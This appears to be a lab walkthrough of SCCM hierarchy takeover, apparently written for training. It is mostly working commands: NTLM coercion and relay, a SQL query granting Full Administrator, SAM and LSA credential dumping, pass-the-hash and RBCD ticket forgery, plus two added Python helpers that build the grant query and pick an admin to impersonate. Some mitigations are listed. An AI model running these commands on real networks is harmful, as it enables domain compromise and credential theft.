SCCM - Takeover

SCCM Takeover Techniques

TAKEOVER-1 - Hierarchy takeover via NTLM coercion and relay to MSSQL on remote site database

TAKEOVER-1 documentation

This attack requires the site database to be hosted separately from the site server: we coerce the site server's computer account and relay it to the database server, and a host cannot be relayed to itself.

With the following command we can generate a one-line (stacked) query that grants our normal domain user (mike) the SCCM Full Administrator role (-sc is the site code, -tu the user to grant the role to):

sccmhunter.py mssql -u mike -p password! -d ludus.domain -dc-ip 10.2.10.10 -debug -tu mike -sc 123 -stacked

[screenshot: sccmhunter mssql output]

The target IP is the database server (hosted separately from the site server):

impacket-ntlmrelayx -smb2support -ts -t mssql://10.2.10.13 -q "<full query from sccmhunter>"

For example (the AdminSID literal is mike's domain SID in its binary form):

impacket-ntlmrelayx -smb2support -ts -t mssql://10.2.10.13 -q "DECLARE @AdminID INT; USE CM_123; INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, CreatedDate, ModifiedBy, ModifiedDate, SourceSite) SELECT 0x010500000000000515000000EB54F0667AE95CAA872ED88965040000, 'ludus\mike', 0, 0, '', '', '', '', '123' WHERE NOT EXISTS ( SELECT 1 FROM RBAC_Admins WHERE LogonName = 'ludus\mike' ); SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = 'ludus\mike'); INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES  ('SMS0001R', 'SMS00ALL', 29), ('SMS0001R', 'SMS00001', 1), ('SMS0001R', 'SMS00004', 1) ) AS V(RoleID, ScopeID, ScopeTypeID) WHERE NOT EXISTS ( SELECT 1 FROM RBAC_ExtendedPermissions  WHERE AdminID = @AdminID  AND RoleID = V.RoleID  AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID );"
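As an added example (not part of the original page and not sccmhunter's own code), the following Python shows how the stacked query is built from the target user's SID and why the AdminSID column holds a 0x literal: SCCM stores the SID in its binary layout (revision, sub-authority count, 48-bit big-endian authority, then 32-bit little-endian sub-authorities). The role and scope rows are the ones from the query above; domain, user name and site code are whatever you pass in, and the values used in the __main__ block are taken from this page. The same query is the one TAKEOVER-2 refers back to.

```python
"""
Added example (not from the original page or from sccmhunter): build the
stacked T-SQL that grants a domain user the SCCM Full Administrator role,
starting from the user's string SID. The AdminSID column stores the SID in
binary form, which is why the page's query carries a 0x... literal.
"""
import re


def sid_to_bytes(sid: str) -> bytes:
    """Encode 'S-1-<authority>-<sub>-...' in the binary SID layout:
    revision (1 byte) | sub-authority count (1) | authority (6, big-endian)
    | sub-authorities (4 bytes each, little-endian)."""
    m = re.fullmatch(r"S-(\d+)-(\d+)((?:-\d+)+)", sid)
    if not m:
        raise ValueError(f"not a SID string: {sid!r}")
    revision, authority = int(m.group(1)), int(m.group(2))
    subs = [int(s) for s in m.group(3).split("-")[1:]]
    if revision != 1 or len(subs) > 15 or authority >= 1 << 48:
        raise ValueError(f"unsupported SID: {sid!r}")
    raw = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    for sub in subs:
        raw += sub.to_bytes(4, "little")  # each sub-authority is a little-endian DWORD
    return raw


def bytes_to_sid(raw: bytes) -> str:
    """Decode a binary SID back to its string form (handy to sanity-check a 0x literal)."""
    if len(raw) < 8 or raw[0] != 1 or len(raw) != 8 + 4 * raw[1]:
        raise ValueError("malformed binary SID")
    authority = int.from_bytes(raw[2:8], "big")
    subs = [int.from_bytes(raw[8 + 4 * i:12 + 4 * i], "little") for i in range(raw[1])]
    return "S-%d-%d-%s" % (raw[0], authority, "-".join(map(str, subs)))


# RBAC rows the page's query inserts: the Full Administrator role (SMS0001R) on the
# "All" security scope (SMS00ALL, scope type 29) and on the All Systems (SMS00001)
# and All Users and User Groups (SMS00004) collections (scope type 1).
FULL_ADMIN_ROWS = (("SMS0001R", "SMS00ALL", 29),
                   ("SMS0001R", "SMS00001", 1),
                   ("SMS0001R", "SMS00004", 1))


def build_full_admin_query(sid: str, logon_name: str, site_code: str) -> str:
    """Return the stacked query that adds logon_name (DOMAIN\\user) to RBAC_Admins
    and grants it the Full Administrator rows; both inserts are idempotent."""
    if not re.fullmatch(r"[A-Za-z0-9.-]+\\[A-Za-z0-9._-]+", logon_name):
        raise ValueError("logon_name must look like DOMAIN\\user")
    if not re.fullmatch(r"[A-Z0-9]{3}", site_code):
        raise ValueError("site code must be three alphanumerics")
    sid_hex = "0x" + sid_to_bytes(sid).hex().upper()
    values = ", ".join(f"('{r}', '{s}', {t})" for r, s, t in FULL_ADMIN_ROWS)
    return (
        f"DECLARE @AdminID INT; USE CM_{site_code}; "
        "INSERT INTO RBAC_Admins (AdminSID, LogonName, IsGroup, IsDeleted, CreatedBy, "
        "CreatedDate, ModifiedBy, ModifiedDate, SourceSite) "
        f"SELECT {sid_hex}, '{logon_name}', 0, 0, '', '', '', '', '{site_code}' "
        f"WHERE NOT EXISTS (SELECT 1 FROM RBAC_Admins WHERE LogonName = '{logon_name}'); "
        f"SET @AdminID = (SELECT TOP 1 AdminID FROM RBAC_Admins WHERE LogonName = '{logon_name}'); "
        "INSERT INTO RBAC_ExtendedPermissions (AdminID, RoleID, ScopeID, ScopeTypeID) "
        f"SELECT @AdminID, RoleID, ScopeID, ScopeTypeID FROM (VALUES {values}) "
        "AS V(RoleID, ScopeID, ScopeTypeID) "
        "WHERE NOT EXISTS (SELECT 1 FROM RBAC_ExtendedPermissions WHERE AdminID = @AdminID "
        "AND RoleID = V.RoleID AND ScopeID = V.ScopeID AND ScopeTypeID = V.ScopeTypeID);"
    )


if __name__ == "__main__":
    # The literal from the ntlmrelayx command on this page, decoded and rebuilt.
    page_hex = "010500000000000515000000EB54F0667AE95CAA872ED88965040000"
    sid = bytes_to_sid(bytes.fromhex(page_hex))
    print(sid)  # S-1-5-21-<domain>-1125: mike's SID, RID 1125
    print(build_full_admin_query(sid, "ludus\\mike", "123"))
```

Decoding the literal before relaying is a cheap check that the SID really belongs to the account you intend to promote; the wrong RID silently grants Full Administrator to someone else.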

Next we coerce the site server with PetitPotam (or Coercer, etc.). The first IP is that of your ntlmrelayx host, the second is the site server:

python3 PetitPotam.py -d ludus.domain -u mike -p password! 10.2.10.99 10.2.10.15

[screenshot: PetitPotam output]

Next, we can confirm with sccmhunter that we hold the SCCM Full Administrator role and, as a result, membership in the local SMS Admins group on the site server (which is what gives the admin module's WMI queries access):

sccmhunter.py admin -u mike -p password! -ip 10.2.10.15
show_admins
show_rbac

[screenshot: sccmhunter admin output]

What can we do with Full Administrator permissions?

The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this role can execute arbitrary programs on any online client device as SYSTEM, as the currently logged-on user, or as a specific user at their next logon. They can also use CMPivot and Run Script to query or execute scripts on client devices in real time through the AdminService or WMI on an SMS Provider. See EXEC-1, EXEC-2, etc.

[screenshot: Full Administrator permissions]

Recommendation:

Enable Extended Protection for Authentication (EPA) on the site database's SQL Server instance (and on AD CS web enrollment, which TAKEOVER-3 relies on), so relayed NTLM authentication is rejected.


TAKEOVER-2 - Hierarchy takeover via NTLM coercion and relay to SMB on remote site database

TAKEOVER-2 documentation

Similar to TAKEOVER-1, but now we relay to SMB on the database server instead of to MSSQL.

Start ntlmrelayx to dump the SAM of the database server (the default action), or add the -socks option to keep the relayed session for reuse:

impacket-ntlmrelayx -t 10.2.10.13 -smb2support

Coerce the site server computer account against site database (<ntlmrelayx IP> <site server IP>):

python3 PetitPotam.py -d ludus.domain -u mike -p password! 10.2.10.99 10.2.10.15

[screenshot: PetitPotam output (SMB relay)]

With the -socks option (the same ntlmrelayx command plus -socks), the relayed SMB session is held open instead of being used for a SAM dump:

[screenshot: ntlmrelayx SOCKS output]

Then dump the SAM or get a shell through the SOCKS proxy as the relayed site server account, and reuse the dumped local Administrator hash with netexec:

proxychains -q impacket-secretsdump 'LUDUS/SCCM-SITESRV$@10.2.10.13' -no-pass
proxychains -q impacket-smbexec LUDUS/'SCCM-SITESRV$'@10.2.10.13 -no-pass
netexec smb 10.2.10.13 -u administrator -H 8846f7eaee8fb117ad06bdd830b7586c --local-auth

[screenshot: netexec SMB output]

At this point, if the SQL Server service runs as LocalSystem, local administrator access on the database host is enough to run the query that grants your domain account the Full Administrator role (see the TAKEOVER-1 SQL query). If SQL Server runs as a domain service account, further steps are needed:

In your shell, check which account sqlservr.exe runs as:

tasklist /v /fi "IMAGENAME eq sqlservr.exe" 

[screenshot: tasklist output]

Get the SQL service domain account's password from the LSA secrets of the database server:

secretsdump.py administrator@10.2.10.13 -hashes :8846f7eaee8fb117ad06bdd830b7586c

[screenshot: secretsdump output with the SQL service account password]

Sync time if needed (on a "Clock skew too great" error):

sudo ntpdate 10.2.10.10
 
or:
 
sudo timedatectl set-ntp off
sudo rdate -n 10.2.10.10

Get TGT for sqlsccmsvc:

impacket-getTGT "ludus.domain/sqlsccmsvc:Password123"

[screenshot: getTGT output]

List the SPNs of the service account (the MSSQLSvc SPN is the one used in the S4U request below; -request additionally requests service tickets for Kerberoasting, which is not needed here):

impacket-GetUserSPNs ludus.domain/domainuser:password -dc-ip 10.2.10.10 -request

Then request an S4U2Self ticket as the service account, impersonating the site server's computer account to the account's own MSSQLSvc SPN (the site server computer account has sysadmin rights on the site database):

python3 /opt/PKINITtools/gets4uticket.py kerberos+ccache://ludus.domain\\sqlsccmsvc:sqlsccmsvc.ccache@DC01.ludus.domain MSSQLSvc/sccm-sql.ludus.domain:1433@ludus.domain SCCM-SITESRV\$@ludus.domain sqlsccmsvc_s4u.ccache -v

Once the ticket is obtained, point KRB5CCNAME at it (the file name given as the last argument above):

export KRB5CCNAME=sqlsccmsvc_s4u.ccache

Get access to the site database (MSSQL) as the site server, targeting the host named in the SPN:

impacket-mssqlclient ludus.domain/SCCM-SITESRV\$@sccm-sql.ludus.domain -k -no-pass -windows-auth

Then give your low priv user Full administrator permissions (see the SQL query from Takeover-1).


TAKEOVER-3 - Hierarchy takeover via NTLM coercion and relay to HTTP on AD CS

TAKEOVER-3 documentation

When available, SCCM uses public key infrastructure (PKI) for authentication and authorization. While not required, administrators may choose to deploy Active Directory Certificate Services (AD CS) to support SCCM's various certificate requirements rather than use self-signed certificates. AD CS is home to its own misconfigurations, particularly ESC8: the certificate enrollment web interface is vulnerable to NTLM relaying. An attacker may coerce NTLM authentication from a coercion target and relay it to the AD CS enrollment web service to enroll in a template and obtain a certificate on behalf of the target. That certificate can then be used to authenticate as the coerced target and escalate to "Full Administrator" in SCCM.

Check if ADCS is vulnerable to ESC8:

certipy find -u domainuser -p password -dc-ip 10.2.10.10 -vulnerable -stdout

[screenshot: certipy output showing ESC8]

And NTLM authentication is enabled on the enrollment web service (check every CA; a 401 response offering WWW-Authenticate: NTLM confirms it):

curl -I http://10.2.10.10/certsrv/certfnsh.asp

[screenshot: curl output showing NTLM enabled]

Start ntlmrelayx with the --adcs flag and target the URL of the certificate enrollment web interface:

ntlmrelayx.py -t http://10.2.10.10/certsrv/certfnsh.asp --adcs -smb2support

Next, use PetitPotam (or Coercer) to coerce the site server. The coerced SMB authentication is relayed to the AD CS enrollment service to request a certificate for the coerced target:

python3 PetitPotam.py -u domainuser -p password 10.2.10.99 10.2.10.15

[screenshot: ntlmrelayx relaying the authentication and retrieving the certificate]

Use the PFX to get the NTLM hash of the site server computer account (for example with Certipy's auth command and its -pfx option, which authenticates via PKINIT and recovers the NT hash):

[screenshot: NTLM hash retrieved with the certificate]

Authenticate to an SMS Provider as the site server and grant a user the Full Administrator role:

sccmhunter.py admin -u sccm-sitesrv$ -p aad3b435b51404eeaad3b435b51404ee:9e1762e7e18826fa764ec54e1858fb0d -ip 10.2.10.15
 
get_user lowpriv
add_admin lowpriv <SID>
show_admins

[screenshot: sccmhunter add_admin output]


TAKEOVER-4 - Hierarchy takeover via NTLM coercion and relay from CAS to origin primary site server

TAKEOVER-4 documentation

This requires a CAS (Central Administration Site) which can only be found in a multi-site hierarchy (not in the SCCM lab). See documentation for the details.


TAKEOVER-5 - Hierarchy Takeover via NTLM coercion and relay to AdminService on remote SMS Provider

TAKEOVER-5 documentation

Requires a remote SMS provider because you cannot relay the site server to itself (not in the SCCM lab). See documentation for the details.


TAKEOVER-6 - Hierarchy takeover via NTLM coercion and relay to SMB on remote SMS Provider

TAKEOVER-6 documentation

Requires a remote SMS provider because you cannot relay the site server to itself (not in the SCCM lab). See documentation for the details.


TAKEOVER-7 - Hierarchy Takeover via NTLM coercion and relay to SMB between primary and passive site servers

TAKEOVER-7 documentation

Requires an active and passive site server (not in the SCCM lab). See documentation for the details.


TAKEOVER-8 - Hierarchy takeover via NTLM coercion and relay HTTP to LDAP on domain controller

TAKEOVER-8 documentation

This is a good alternative when SMB signing blocks the SMB relays above: the coerced authentication is obtained over HTTP (WebDAV) and relayed to LDAP, so SMB signing does not apply.

Check whether LDAP signing and LDAPS channel binding are enforced on the DC (the relay only works if they are not):

netexec ldap 10.2.10.10 -u domainuser -p password -M ldap-checker

[screenshot: ldap-checker output]

Check if you can create computer accounts: ms-DS-MachineAccountQuota must be greater than 0 (the default is 10). Query it on the DC with the maq module:

netexec ldap 10.2.10.10 -u domainuser -p password -M maq

[screenshot: machine account quota check]

Check if webdav is enabled on the site server:

netexec smb 10.2.10.15 -u domainuser -p password -M webdav

[screenshot: webdav module output]

On the attacker machine we first start ntlmrelayx and target LDAP on any DC (ldaps:// is also supported, and ntlmrelayx switches to LDAPS automatically when the operation requires it). This command automatically adds a computer account and configures resource-based constrained delegation (RBCD) to it. It is also possible to do that step manually by first adding a computer account with the impacket-addcomputer tool and adding --escalate-user <COMPUTER$> to the ntlmrelayx command:

impacket-ntlmrelayx --no-smb-server --no-wcf-server --no-raw-server -ts -ip 10.2.10.99 -t ldap://10.2.10.10 --http-port 8080 --no-da --delegate-access

Next, we add a DNS record hackdef to the domain which points to our attacker machine (10.2.10.99). Authenticated users can add DNS records by default:

python3 dnstool.py -u 'ludus.domain\mike' -a add -r hackdef -d 10.2.10.99 10.2.10.10

[screenshot: dnstool output adding the record]

This hostname is needed for the WebClient authentication (WebDAV): the WebClient only sends NTLM credentials automatically to hosts it places in the intranet zone, and a single-label name such as hackdef qualifies while an IP address does not. Specifying an IP in the following PetitPotam command therefore won't work.

We coerce the site server (10.2.10.15) with a tool such as Petitpotam/printerbug or Coercer:

python3 PetitPotam.py -d ludus.domain -u mike -p password123 hackdef@8080/a 10.2.10.15

[screenshot: PetitPotam output]

[screenshot: ntlmrelayx output adding the computer account and delegation rights]

The new computer account LYQVFVGE$ can now impersonate users to SCCM-SITESRV$ via S4U2Proxy (resource-based constrained delegation). Take note of the created computer account and its password from the ntlmrelayx output.

Request a service ticket for the domainadmin user via S4U2Self/S4U2Proxy; it is only valid for SCCM-SITESRV.ludus.domain. SPNs other than CIFS (needed for psexec) can be specified, such as HOST or HTTP for WinRM. Make sure that the domain admin you target is enabled, not a member of the Protected Users group and not flagged "sensitive and cannot be delegated", otherwise the KDC will not issue a forwardable ticket. The password you are prompted for is the one of the created computer account (it can also be given inline as ludus.domain/LYQVFVGE$:<password>):

impacket-getST 'ludus.domain/LYQVFVGE$' -spn 'cifs/SCCM-SITESRV.ludus.domain' -impersonate domainadmin -dc-ip 10.2.10.10

[screenshot: getST output]
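The impersonation constraints in the paragraph above, as an added example (not from the original page or from impacket): given an account's userAccountControl and memberOf attributes, list what would make the S4U2Proxy step fail. The sample records are constructed for the example, the attribute names are the standard AD ones, and only direct membership of Protected Users is checked (an assumption; nested membership would need a group lookup).

```python
"""
Added example (not from the original page or from impacket): check, from an
account's directory attributes, whether the S4U2Proxy step of TAKEOVER-8 can
impersonate it. The KDC does not issue a forwardable S4U2Self ticket for
accounts that are disabled, flagged "sensitive and cannot be delegated", or
members of Protected Users, so getST -impersonate fails for them.
The records below are constructed sample data, not output from a real domain.
"""

ACCOUNTDISABLE = 0x0002    # userAccountControl: account is disabled
NOT_DELEGATED = 0x100000   # userAccountControl: "sensitive and cannot be delegated"
NORMAL_ACCOUNT = 0x0200
# Default DN of the group is CN=Protected Users,CN=Users,DC=...; prefix match on the RDN.
PROTECTED_USERS_PREFIX = "cn=protected users,"


def impersonation_blockers(account: dict) -> list:
    """Return the reasons S4U2Proxy impersonation of this account would fail
    (an empty list means no blocker was found). Only direct memberOf entries
    are examined, which is an assumption of this example."""
    reasons = []
    uac = int(account.get("userAccountControl", 0))
    if uac & ACCOUNTDISABLE:
        reasons.append("account is disabled")
    if uac & NOT_DELEGATED:
        reasons.append("account is sensitive and cannot be delegated")
    if any(dn.lower().startswith(PROTECTED_USERS_PREFIX)
           for dn in account.get("memberOf", [])):
        reasons.append("member of Protected Users")
    return reasons


def pick_impersonation_target(accounts: list) -> str:
    """Return the sAMAccountName of the first candidate with no blockers."""
    for acct in accounts:
        if not impersonation_blockers(acct):
            return acct["sAMAccountName"]
    raise LookupError("no delegatable account among the candidates")


# Constructed sample candidates shaped like LDAP attributes (not real directory output).
SAMPLE_ADMINS = [
    {"sAMAccountName": "secadmin", "userAccountControl": NORMAL_ACCOUNT,
     "memberOf": ["CN=Protected Users,CN=Users,DC=ludus,DC=domain",
                  "CN=Domain Admins,CN=Users,DC=ludus,DC=domain"]},
    {"sAMAccountName": "svc_deploy", "userAccountControl": NORMAL_ACCOUNT | NOT_DELEGATED,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=ludus,DC=domain"]},
    {"sAMAccountName": "olddadmin", "userAccountControl": NORMAL_ACCOUNT | ACCOUNTDISABLE,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=ludus,DC=domain"]},
    {"sAMAccountName": "domainadmin", "userAccountControl": NORMAL_ACCOUNT,
     "memberOf": ["CN=Domain Admins,CN=Users,DC=ludus,DC=domain"]},
]

if __name__ == "__main__":
    for acct in SAMPLE_ADMINS:
        print(acct["sAMAccountName"], impersonation_blockers(acct) or "ok")
    print("use -impersonate", pick_impersonation_target(SAMPLE_ADMINS))
```

Running this over the real attribute values (for example from an LDAP dump) before calling getST saves a round of confusing KDC errors; the same three conditions are the ones defenders can use to make their privileged accounts poor RBCD targets.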

If you get a clock skew error:

sudo timedatectl set-ntp off
sudo ntpdate 10.2.10.10

Export the ticket:

export KRB5CCNAME=domainadmin@cifs_SCCM-SITESRV.ludus.domain@LUDUS.DOMAIN.ccache

Use the ticket with a tool such as netexec to dump the LSA secrets of the site server and retrieve its computer account NTLM hash (SCCM-SITESRV$):

 netexec smb 10.2.10.15 -u domainadmin --use-kcache --lsa

[screenshot: netexec output with the site server computer account hash]

This NTLM hash can be used to dump all credentials from the site database, see the CRED-5 section.

Recommendation:

  • Require LDAP signing and LDAPS channel binding on domain controllers.
  • Disable the WebClient service on site servers.
  • Make sure that normal users cannot add computer accounts by setting ms-DS-MachineAccountQuota to 0.
  • Do not allow authenticated users to add DNS records.

TAKEOVER-9 documentation

There are no other MSSQL servers in the SCCM lab and the documentation is missing for this one. However, I'm assuming that Takeover 9 is meant to describe how you can abuse MSSQL links configured with DBA privileges. If such a link is configured with the site database, it would allow for command execution on the site database MSSQL server.